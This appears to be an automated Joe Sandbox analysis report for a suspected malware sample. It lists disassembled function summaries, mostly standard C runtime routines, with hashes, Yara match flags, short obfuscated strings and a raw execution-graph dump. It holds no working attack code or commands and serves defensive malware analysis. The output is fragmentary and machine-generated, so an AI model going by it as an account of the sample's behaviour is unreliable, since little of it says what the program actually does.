                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _strrchr
                                                                  • String ID:
                                                                  • API String ID: 3213747228-0
                                                                  • Opcode ID: f7094994ec903abcce49a6c1a655cc9da7e5ebab3a0cb20de3e6a5e810294d9f
                                                                  • Instruction ID: 1da27f92ed9117f5100c86c39a6ada96c517f4b38d76618bfbf882f7bb3b9621
                                                                  • Opcode Fuzzy Hash: f7094994ec903abcce49a6c1a655cc9da7e5ebab3a0cb20de3e6a5e810294d9f
                                                                  • Instruction Fuzzy Hash: A0B16572E00295AFDB11CF68CC83BEE7BA6EF55310F244159E914AB382DB74D942C7A4
                                                                  APIs
                                                                  • __getptd.LIBCMT ref: 0040B8AB
                                                                    • Part of subcall function 00408CA0: __getptd_noexit.LIBCMT ref: 00408CA3
                                                                    • Part of subcall function 00408CA0: __amsg_exit.LIBCMT ref: 00408CB0
                                                                  • __getptd.LIBCMT ref: 0040B8C2
                                                                  • __amsg_exit.LIBCMT ref: 0040B8D0
                                                                  • __lock.LIBCMT ref: 0040B8E0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816651678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1816631636.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816651678.000000000042A000.00000020.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816702499.0000000000457000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816723648.0000000000458000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816747545.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816767087.0000000000464000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                  Similarity
                                                                  • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                  • String ID: p}E
                                                                  • API String ID: 3521780317-932643814
                                                                  • Opcode ID: 2672bc7ca664fdd40ab9168032a27059e81ca72cc596f4e33d204ce2b74bd78f
                                                                  • Instruction ID: 41ca909a7fa17ccae20582b561b6b04ac6bde91f9f8c6f347843e093de949195
                                                                  • Opcode Fuzzy Hash: 2672bc7ca664fdd40ab9168032a27059e81ca72cc596f4e33d204ce2b74bd78f
                                                                  • Instruction Fuzzy Hash: ADF06D32A047049BD620BB76980275A73A4AF00759F51867FE441BB2E2DB7C9940CBAD
                                                                  APIs
                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000), ref: 004060BF
                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 004060F0
                                                                  • GetLastError.KERNEL32 ref: 00406106
                                                                  • GetLastError.KERNEL32(?,004062A1,?,?,00000000,00455FA8,00000010,00404E93,00000000,?,74DEDFA0,74DEDFA0,?,00000000,?,00404EDC), ref: 00406166
                                                                  • __dosmaperr.LIBCMT ref: 004061A9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816651678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1816631636.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816651678.000000000042A000.00000020.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816702499.0000000000457000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816723648.0000000000458000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816747545.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816767087.0000000000464000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$ByteCharFileMultiWideWrite__dosmaperr
                                                                  • String ID:
                                                                  • API String ID: 3779282958-0
                                                                  • Opcode ID: 101452add1fa48b778b1bf75d151f40d4cd8f46acbf92be4778b0df45f29199f
                                                                  • Instruction ID: 27c8a5566bd40633a4f567d6a347978cfff9d3da852d1c488ca5c9da231eff9c
                                                                  • Opcode Fuzzy Hash: 101452add1fa48b778b1bf75d151f40d4cd8f46acbf92be4778b0df45f29199f
                                                                  • Instruction Fuzzy Hash: FC417F31A02124CFDB21DB24CD44ADAB7B5FF06364F0501EAE40ABAAD1C7785E90CF96
                                                                  APIs
                                                                  • __lock.LIBCMT ref: 00407EA1
                                                                    • Part of subcall function 0040656D: __mtinitlocknum.LIBCMT ref: 00406583
                                                                    • Part of subcall function 0040656D: __amsg_exit.LIBCMT ref: 0040658F
                                                                    • Part of subcall function 0040656D: EnterCriticalSection.KERNEL32(?,?,?,00405A32,00000004,00455F88,0000000C,0040AB49,74DEDFA0,?,00000000,00000000,00000000,?,00408C52,00000001), ref: 00406597
                                                                  • ___sbh_find_block.LIBCMT ref: 00407EAC
                                                                  • ___sbh_free_block.LIBCMT ref: 00407EBB
                                                                  • HeapFree.KERNEL32(00000000,74DEDFA0,00456048,0000000C,0040654E,00000000,00455FE8,0000000C,00406588,74DEDFA0,?,?,00405A32,00000004,00455F88,0000000C), ref: 00407EEB
                                                                  • GetLastError.KERNEL32(?,00405A32,00000004,00455F88,0000000C,0040AB49,74DEDFA0,?,00000000,00000000,00000000,?,00408C52,00000001,00000214), ref: 00407EFC
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816651678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1816631636.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816651678.000000000042A000.00000020.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816702499.0000000000457000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816723648.0000000000458000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816747545.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816767087.0000000000464000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                  • String ID:
                                                                  • API String ID: 2714421763-0
                                                                  • Opcode ID: 76e0c42db8dc044e1148e6d670b5a3e3ff1649617a1397201d3b724bef812557
                                                                  • Instruction ID: ac943536733178e3116658e9d7b5a01d31343d9a7912f5ecead2d15f24cb9749
                                                                  • Opcode Fuzzy Hash: 76e0c42db8dc044e1148e6d670b5a3e3ff1649617a1397201d3b724bef812557
                                                                  • Instruction Fuzzy Hash: 33017171D05201A6DB21AB72AC0675F36649F00769F10857EF511B61D2DB7CAD408A9E
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816651678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1816631636.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816651678.000000000042A000.00000020.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816702499.0000000000457000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816723648.0000000000458000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816747545.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816767087.0000000000464000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                  Similarity
                                                                  • API ID: __calloc_crt
                                                                  • String ID: sE$0uE
                                                                  • API String ID: 3494438863-280079329
                                                                  • Opcode ID: 1e260c7051c8069211b872dd05f1ae6eaff2c6aa00f59d7a50ba6c9191058e07
                                                                  • Instruction ID: 5c3b15b56c07c431eec0f331a1747e63a73b6ae96789bc0a0f398cc4b72dc8a7
                                                                  • Opcode Fuzzy Hash: 1e260c7051c8069211b872dd05f1ae6eaff2c6aa00f59d7a50ba6c9191058e07
                                                                  • Instruction Fuzzy Hash: 5C11CA7230421167E7284F1DBC5066632D5E744724B29413FF516EB3E5FB78DC61454E
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(KERNEL32,00407C8A), ref: 0040D43D
                                                                  • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 0040D44D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816651678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1816631636.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816651678.000000000042A000.00000020.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816702499.0000000000457000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816723648.0000000000458000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816747545.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816767087.0000000000464000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                  • API String ID: 1646373207-3105848591
                                                                  • Opcode ID: d04afb31ecf6eacdaa9a74a1584815079827348a154b73a453fbb45ac7f3e72d
                                                                  • Instruction ID: 4dc727c415690c93b8a9960aa62b0e4da6991ad9cd5a9a87487a5a08f2fffa48
                                                                  • Opcode Fuzzy Hash: d04afb31ecf6eacdaa9a74a1584815079827348a154b73a453fbb45ac7f3e72d
                                                                  • Instruction Fuzzy Hash: 76F01D30A00A09A2DB002FA1AD0E6AF7F78BB80746F9105A1D5D6B00E5DE3491B9D24A
                                                                  APIs
                                                                  • ___addlocaleref.LIBCMT ref: 0040B873
                                                                    • Part of subcall function 0040B739: InterlockedIncrement.KERNEL32(74DEDFA0), ref: 0040B74B
                                                                    • Part of subcall function 0040B739: InterlockedIncrement.KERNEL32(?), ref: 0040B758
                                                                    • Part of subcall function 0040B739: InterlockedIncrement.KERNEL32(?), ref: 0040B765
                                                                    • Part of subcall function 0040B739: InterlockedIncrement.KERNEL32(?), ref: 0040B772
                                                                    • Part of subcall function 0040B739: InterlockedIncrement.KERNEL32(?), ref: 0040B77F
                                                                    • Part of subcall function 0040B739: InterlockedIncrement.KERNEL32(?), ref: 0040B79B
                                                                    • Part of subcall function 0040B739: InterlockedIncrement.KERNEL32(?), ref: 0040B7AB
                                                                    • Part of subcall function 0040B739: InterlockedIncrement.KERNEL32(?), ref: 0040B7C1
                                                                  • ___removelocaleref.LIBCMT ref: 0040B87E
                                                                    • Part of subcall function 0040B7C8: InterlockedDecrement.KERNEL32(74DEDFA0), ref: 0040B7E2
                                                                    • Part of subcall function 0040B7C8: InterlockedDecrement.KERNEL32(?), ref: 0040B7EF
                                                                    • Part of subcall function 0040B7C8: InterlockedDecrement.KERNEL32(?), ref: 0040B7FC
                                                                    • Part of subcall function 0040B7C8: InterlockedDecrement.KERNEL32(?), ref: 0040B809
                                                                    • Part of subcall function 0040B7C8: InterlockedDecrement.KERNEL32(?), ref: 0040B816
                                                                    • Part of subcall function 0040B7C8: InterlockedDecrement.KERNEL32(?), ref: 0040B832
                                                                    • Part of subcall function 0040B7C8: InterlockedDecrement.KERNEL32(?), ref: 0040B842
                                                                    • Part of subcall function 0040B7C8: InterlockedDecrement.KERNEL32(?), ref: 0040B858
                                                                  • ___freetlocinfo.LIBCMT ref: 0040B892
                                                                    • Part of subcall function 0040B5F0: ___free_lconv_mon.LIBCMT ref: 0040B636
                                                                    • Part of subcall function 0040B5F0: ___free_lconv_num.LIBCMT ref: 0040B657
                                                                    • Part of subcall function 0040B5F0: ___free_lc_time.LIBCMT ref: 0040B6DC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816651678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1816631636.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816651678.000000000042A000.00000020.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816702499.0000000000457000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816723648.0000000000458000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816747545.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816767087.0000000000464000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Interlocked$DecrementIncrement$___addlocaleref___free_lc_time___free_lconv_mon___free_lconv_num___freetlocinfo___removelocaleref
                                                                  • String ID: p}E
                                                                  • API String ID: 467427115-932643814
                                                                  • Opcode ID: dc0950cdbfca43cb46e8eada1e3bba07d17679a0d86d7d7e199d096445f6bc46
                                                                  • Instruction ID: 87dfc9db6cc6096610c3faad33b2f7d684f12c379cb45246b1d4642d53edf423
                                                                  • Opcode Fuzzy Hash: dc0950cdbfca43cb46e8eada1e3bba07d17679a0d86d7d7e199d096445f6bc46
                                                                  • Instruction Fuzzy Hash: 49E04F23501A2315CE363A1D680026B92ACCFD3756B1D41BFF808B72E6DB3D4C8045DD
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816901578.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AdjustPointer
                                                                  • String ID:
                                                                  • API String ID: 1740715915-0
                                                                  • Opcode ID: dc0238863d457a27e1bce2d0ac5b8b7f0b6a77dde26d3f9465aa75132b8b44d9
                                                                  • Instruction ID: fc583f7421d1c731fa57cde423b7f2310be3ba93bcb1b84ea747b87df87604c2
                                                                  • Opcode Fuzzy Hash: dc0238863d457a27e1bce2d0ac5b8b7f0b6a77dde26d3f9465aa75132b8b44d9
                                                                  • Instruction Fuzzy Hash: 4451B4726012069FDB299F14D861BBA77E6EF44320F14852DF90567292E731EC92C7D4
                                                                  APIs
                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0040A65F
                                                                  • __isleadbyte_l.LIBCMT ref: 0040A693
                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,?,?,00000000,?,?,?,00000000), ref: 0040A6C4
                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,?,00000000,?,?,?,00000000), ref: 0040A732
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816651678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1816631636.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816651678.000000000042A000.00000020.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816702499.0000000000457000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816723648.0000000000458000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816747545.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816767087.0000000000464000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                  • String ID:
                                                                  • API String ID: 3058430110-0
                                                                  • Opcode ID: e224db6d442c4383dec286caddee01323d1a9b74086a6ff5f5bdec3bc306d917
                                                                  • Instruction ID: c1c6d2d90700bb89a23820e70023eb6faf0b0996d5bc632f70591ff8279ac006
                                                                  • Opcode Fuzzy Hash: e224db6d442c4383dec286caddee01323d1a9b74086a6ff5f5bdec3bc306d917
                                                                  • Instruction Fuzzy Hash: 1131C231900345EFCB10DF64C884AAE3BB4EF01350F19897AE4A5AB2D1D336DD61DB5A
                                                                  APIs
                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0063C300
                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0063C319
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816901578.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Value___vcrt_
                                                                  • String ID:
                                                                  • API String ID: 1426506684-0
                                                                  • Opcode ID: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                                                                  • Instruction ID: 3749880c75a45a6b8eac1f779edb987ce3a485797d04c505634ab316e8d7cfc2
                                                                  • Opcode Fuzzy Hash: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                                                                  • Instruction Fuzzy Hash: 2501D8322096119EF67427B87CC599B2ADAFB01774F60823DF510B51E3EF255C0252D8
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816651678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1816631636.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816651678.000000000042A000.00000020.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816702499.0000000000457000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816723648.0000000000458000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816747545.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1816767087.0000000000464000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                  Similarity
                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                  • String ID:
                                                                  • API String ID: 3016257755-0
                                                                  • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                  • Instruction ID: c58f584344cc129f44cbeb7ed45c579eb2bf2b78e110a3470603264a11baad7e
                                                                  • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                  • Instruction Fuzzy Hash: 3B11607240004EFBCF165ED5DC41CEE3F22BB08354F588426FE1869164D23AC9B5AB86
                                                                  APIs
                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 0063C15F
                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 0063C213
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816901578.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                  • String ID: csm
                                                                  • API String ID: 3480331319-1018135373
                                                                  • Opcode ID: 2a817a1480194b9b32cfb7907dea545d9bb946fea234306998335fac64bc32e7
                                                                  • Instruction ID: c2d31e345bf9dd372697c0bac89544be27c3bb0cc830d1f95f63d22d11481c21
                                                                  • Opcode Fuzzy Hash: 2a817a1480194b9b32cfb7907dea545d9bb946fea234306998335fac64bc32e7
                                                                  • Instruction Fuzzy Hash: 2B41B234A00218ABCF10DFA8D880ADEBBB6AF45324F148169F815AB352C7319A15DBD5
                                                                  APIs
                                                                  • __Init_thread_footer.LIBCMT ref: 00631D5B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816901578.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Init_thread_footer
                                                                  • String ID: BAOJ$JAY@
                                                                  • API String ID: 1385522511-1137680417
                                                                  • Opcode ID: a0d43f2bff2cdd8459d4469a3dc09680b743f1bf2a176f00ca3623db7dc0a4ed
                                                                  • Instruction ID: a53652c4166c7e4559b8034c9852d78ae427b0f264ebb36748bc45b729289795
                                                                  • Opcode Fuzzy Hash: a0d43f2bff2cdd8459d4469a3dc09680b743f1bf2a176f00ca3623db7dc0a4ed
                                                                  • Instruction Fuzzy Hash: A6215770F002449AD730DF68E8467A9B3A0FF16304FA0426DE8444B262DBB41582DB8E
                                                                  APIs
                                                                  • __Init_thread_footer.LIBCMT ref: 00638E0E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816901578.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Init_thread_footer
                                                                  • String ID: G@ZK$[@G_
                                                                  • API String ID: 1385522511-2338778587
                                                                  • Opcode ID: 1e8f8208f12b7c16407fd68a52fe85551186d20058d4469b98e4fffa1dba6e00
                                                                  • Instruction ID: 3ce7e70523e69481ddd743886623092db3085acf4b2738581d0d8d782c23fd83
                                                                  • Opcode Fuzzy Hash: 1e8f8208f12b7c16407fd68a52fe85551186d20058d4469b98e4fffa1dba6e00
                                                                  • Instruction Fuzzy Hash: 7201D670F00344CFC710EFB8EC419ADB7B1A719310FA0016DF565AB291DA75A8019B8A
                                                                  APIs
                                                                  • __Init_thread_footer.LIBCMT ref: 0063882E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816901578.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Init_thread_footer
                                                                  • String ID: G@ZK$[@G_
                                                                  • API String ID: 1385522511-2338778587
                                                                  • Opcode ID: 7838c3211c085e07b27c5848d939389a9bfd04a1f51875a12125b6f39e7dd458
                                                                  • Instruction ID: 5642563f8dfef5e1eb1b2032252fba955b6515ff81a2b6628b4b50181208c3cf
                                                                  • Opcode Fuzzy Hash: 7838c3211c085e07b27c5848d939389a9bfd04a1f51875a12125b6f39e7dd458
                                                                  • Instruction Fuzzy Hash: 9601D6F0F01204CBD720DFA8AD41AADB7B0AB19310F9001ADF4556B291DA355842DB8A
                                                                  APIs
                                                                  • __Init_thread_footer.LIBCMT ref: 006381D9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816901578.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Init_thread_footer
                                                                  • String ID: @G@K$A@K.
                                                                  • API String ID: 1385522511-2457859030
                                                                  • Opcode ID: 6a18aaa1088744a2cef52ce5b21989f42f77fe0bf8ffefca87306ddb1a3f9198
                                                                  • Instruction ID: 97c8cac64474be6e2fbd18f79813d47044f6dfec67fdc2a876a0994497c7e5db
                                                                  • Opcode Fuzzy Hash: 6a18aaa1088744a2cef52ce5b21989f42f77fe0bf8ffefca87306ddb1a3f9198
                                                                  • Instruction Fuzzy Hash: A3018674F002049FC750DF98E942A9CB7B1E708300FA0017EE95697791DB75AA419B9E
                                                                  APIs
                                                                  • __Init_thread_footer.LIBCMT ref: 006382E9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816901578.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Init_thread_footer
                                                                  • String ID: @G@K$ZYA.
                                                                  • API String ID: 1385522511-4236202813
                                                                  • Opcode ID: 3264282d574ff772c11f641d984cce154067a6c0aea3269eae2f2ae7d2ec284f
                                                                  • Instruction ID: 0c2daa01c8e8416d76471be3082ae15a80cafe71b05204c9cc1f0a520add05e4
                                                                  • Opcode Fuzzy Hash: 3264282d574ff772c11f641d984cce154067a6c0aea3269eae2f2ae7d2ec284f
                                                                  • Instruction Fuzzy Hash: 07018674F00305DFC714EF98E991A9C77B1AB04310F90017EE96557391DA746941DB8A

                                                                  Execution Graph

                                                                  Execution Coverage:21.2%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:1.6%
                                                                  Total number of Nodes:1498
                                                                  Total number of Limit Nodes:22
6408->6409 6409->6410 6418 405a44 6412->6418 6413 405a5e 6415 405a63 6413->6415 6416 405a7a 6413->6416 6414 403154 4 API calls 6414->6418 6419 405930 5 API calls 6415->6419 6417 403154 4 API calls 6416->6417 6421 405a7f 6417->6421 6418->6413 6418->6414 6420 405a76 6419->6420 6423 403154 4 API calls 6420->6423 6422 4059a0 19 API calls 6421->6422 6422->6420 6424 405aa8 6423->6424 6425 403154 4 API calls 6424->6425 6426 405ab6 6425->6426 6426->6410 6427 4076c8 WriteFile 6428 4076e8 6427->6428 6429 4076ef 6427->6429 6430 40748c 21 API calls 6428->6430 6431 407700 6429->6431 6432 4073ec 20 API calls 6429->6432 6430->6429 6432->6431 6433 40a2ca 6442 4096fc 6433->6442 6436 402f24 5 API calls 6437 40a2d4 6436->6437 6438 403198 4 API calls 6437->6438 6439 40a2f3 6438->6439 6440 403198 4 API calls 6439->6440 6441 40a2fb 6440->6441 6451 40569c 6442->6451 6444 409745 6448 403198 4 API calls 6444->6448 6445 409717 6445->6444 6457 40720c 6445->6457 6447 409735 6450 40973d MessageBoxA 6447->6450 6449 40975a 6448->6449 6449->6436 6450->6444 6452 403154 4 API calls 6451->6452 6454 4056a1 6452->6454 6453 4056b9 6453->6445 6454->6453 6455 403154 4 API calls 6454->6455 6456 4056af 6455->6456 6456->6445 6458 40569c 4 API calls 6457->6458 6459 40721b 6458->6459 6460 407221 6459->6460 6461 40722f 6459->6461 6462 40322c 4 API calls 6460->6462 6464 40723f 6461->6464 6466 40724b 6461->6466 6463 40722d 6462->6463 6463->6447 6468 4071d0 6464->6468 6475 4032b8 6466->6475 6469 40322c 4 API calls 6468->6469 6470 4071df 6469->6470 6471 4071fc 6470->6471 6472 406950 CharPrevA 6470->6472 6471->6463 6473 4071eb 6472->6473 6473->6471 6474 4032fc 4 API calls 6473->6474 6474->6471 6476 403278 4 API calls 6475->6476 6477 4032c2 6476->6477 6477->6463 6478 402ccc 6479 402cdd 6478->6479 6483 402cfe 6478->6483 6480 402d88 RtlUnwind 6479->6480 6482 402b28 RaiseException 6479->6482 6479->6483 6481 403154 4 API calls 6480->6481 6481->6483 6484 402d7f 6482->6484 6484->6480 6805 403fcd 6806 403f07 4 API calls 
